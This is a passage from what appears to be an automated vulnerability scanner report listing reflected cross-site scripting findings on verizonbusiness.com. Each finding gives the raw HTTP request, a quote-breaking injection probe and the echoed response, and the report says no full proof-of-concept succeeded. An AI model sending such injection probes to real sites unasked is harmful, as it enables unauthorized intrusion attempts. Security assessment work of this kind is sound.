<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/cnd51a5";144e85efc1d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.486. http://www.verizonbusiness.com/cn/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /cn/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64d1d'%3baeb8833cd86 was submitted in the REST URL parameter 1. This input was echoed as 64d1d';aeb8833cd86 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cn64d1d'%3baeb8833cd86/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/cn64d1d';aeb8833cd86/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.487. http://www.verizonbusiness.com/co/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /co/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96f82"%3b81f7036d4a3 was submitted in the REST URL parameter 1. This input was echoed as 96f82";81f7036d4a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /co96f82"%3b81f7036d4a3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:56:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40604
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/co96f82";81f7036d4a3/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.488. http://www.verizonbusiness.com/co/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /co/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f88b6'%3b5ace4eb3b43 was submitted in the REST URL parameter 1. This input was echoed as f88b6';5ace4eb3b43 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cof88b6'%3b5ace4eb3b43/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40604
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/cof88b6';5ace4eb3b43/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.489. http://www.verizonbusiness.com/countries/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /countries/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5274a"%3b3bfa047d72c was submitted in the REST URL parameter 1. This input was echoed as 5274a";3bfa047d72c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /countries5274a"%3b3bfa047d72c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:05 GMT
Content-Type: text/html
Content-Length: 40620
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/countries5274a";3bfa047d72c/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.490. http://www.verizonbusiness.com/countries/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /countries/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a94f'%3b53e0984e779 was submitted in the REST URL parameter 1. This input was echoed as 7a94f';53e0984e779 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /countries7a94f'%3b53e0984e779/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40618
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/countries7a94f';53e0984e779/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.491. http://www.verizonbusiness.com/de/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32d2f'%3b1b4f203899 was submitted in the REST URL parameter 1. This input was echoed as 32d2f';1b4f203899 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de32d2f'%3b1b4f203899/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:56:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 46786
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/de32d2f';1b4f203899/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.492. http://www.verizonbusiness.com/de/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58f8d"%3b9f24227e815 was submitted in the REST URL parameter 1. This input was echoed as 58f8d";9f24227e815 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de58f8d"%3b9f24227e815/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:43 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 46788
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Seite nicht gefunden";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/de58f8d";9f24227e815/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.493. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33d3f'%3b8a0c05a86bc was submitted in the REST URL parameter 1. This input was echoed as 33d3f';8a0c05a86bc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de33d3f'%3b8a0c05a86bc/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:19 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 46818
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/de33d3f';8a0c05a86bc/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.494. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6115"%3bd00011f8cb9 was submitted in the REST URL parameter 1. This input was echoed as e6115";d00011f8cb9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dee6115"%3bd00011f8cb9/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:07 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 46816
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Seite nicht gefunden";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/dee6115";d00011f8cb9/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.495. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb63a'%3ba490251b8b4 was submitted in the REST URL parameter 2. This input was echoed as fb63a';a490251b8b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de/solutionsfb63a'%3ba490251b8b4/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:44 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/de/solutionsfb63a';a490251b8b4/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.496. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76d60"%3b65d5b6ed1ff was submitted in the REST URL parameter 2. This input was echoed as 76d60";65d5b6ed1ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de/solutions76d60"%3b65d5b6ed1ff/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:56:31 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47600
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:56:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:56:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Seite nicht gefunden";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/de/solutions76d60";65d5b6ed1ff/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.497. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0a65"%3bd9580718d6e was submitted in the REST URL parameter 3. This input was echoed as e0a65";d9580718d6e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de/solutions/vare0a65"%3bd9580718d6e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 48912
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:57:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
h(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Seite nicht gefunden";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/de/solutions/vare0a65";d9580718d6e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.498. http://www.verizonbusiness.com/de/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /de/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c3cf'%3b04d6695c844 was submitted in the REST URL parameter 3. This input was echoed as 9c3cf';04d6695c844 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /de/solutions/var9c3cf'%3b04d6695c844/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:57:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 48914
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:57:37 GMT
